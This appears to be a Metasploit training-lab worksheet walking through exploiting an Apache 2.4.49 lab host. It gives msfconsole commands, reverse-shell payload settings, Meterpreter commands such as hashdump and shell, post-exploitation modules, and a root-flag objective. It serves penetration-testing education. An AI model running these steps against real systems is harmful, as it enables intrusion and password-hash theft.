METASPLOIT FRAMEWORK
FULL EXPLOITATION CHAIN TRAINING LAB
MODULE 07 — SEARCH · USE · SET · EXPLOIT · METERPRETER · POST

OBJECTIVES

  • Launch msfconsole
  • Search for an exploit module
  • Select and configure the module
  • Set payload and options
  • Run the exploit
  • Interact with Meterpreter session
  • Run a post-exploitation module
  • Read the root flag
PHASE 1 — LAUNCH MSFCONSOLE
MISSION BRIEF
PENTEST ENGAGEMENT — AUTHORISED

METASPLOIT — FULL CHAIN

TARGET: 10.10.17.20 — target.apexlab.local

SCENARIO

Nmap previously confirmed Apache 2.4.49 running on 10.10.17.20, a version known to be vulnerable to path traversal / RCE. Use Metasploit to find the right module, configure it, exploit the target, and work through a full post-exploitation workflow.

TARGET

Property    Value
IP          10.10.17.20
Hostname    target.apexlab.local
Port 80     Apache 2.4.49
Port 22     OpenSSH 8.9
OS          Ubuntu 22.04

WORKFLOW

  • Type msfconsole to launch the framework
  • Use search to find the exploit module
  • Use use [module] to select it
  • Use info to learn about it
  • Use set to configure options
  • Use run or exploit
  • Work in the Meterpreter session
  • Run post-exploitation modules
REFERENCE — METASPLOIT
CONSOLE COMMANDS
msfconsole               # Launch framework
search [term]            # Find modules
use [module/number]      # Select module
info                     # Module details
show options             # Show config options
show payloads            # List payloads
set [OPTION] [value]     # Set option
setg [OPTION] [value]    # Set globally
unset [OPTION]           # Clear option
run / exploit            # Execute
back                     # Deselect module
sessions                 # List sessions
sessions -i [id]         # Interact with session
COMMON OPTIONS
set RHOSTS 10.10.17.20   # Target IP
set LHOST 10.10.14.1     # Your IP
set LPORT 4444           # Listen port
set PAYLOAD [payload]    # Set payload
METERPRETER COMMANDS
sysinfo                  # OS + hostname
getuid                   # Current user
getpid                   # Process ID
ps                       # Process list
shell                    # Drop to OS shell
hashdump                 # Dump password hashes
download [file]          # Download file
upload [file] [path]     # Upload file
ls / pwd / cd            # File navigation
background / bg          # Background session
run [post module]        # Run post module
PAYLOAD TYPES
Singles — self-contained, small, fewer features
Stagers — small, connect back, load stage
Stages — downloaded by stager, full-featured

Naming: OS/arch/type (e.g. linux/x86/meterpreter/reverse_tcp)
POST MODULES
post/multi/recon/local_exploit_suggester
post/linux/gather/hashdump
post/multi/gather/env
post/linux/manage/shell_to_meterpreter
SUBMIT ROOT FLAG

Get a Meterpreter session, drop to shell or use download, then read /root/flag.txt.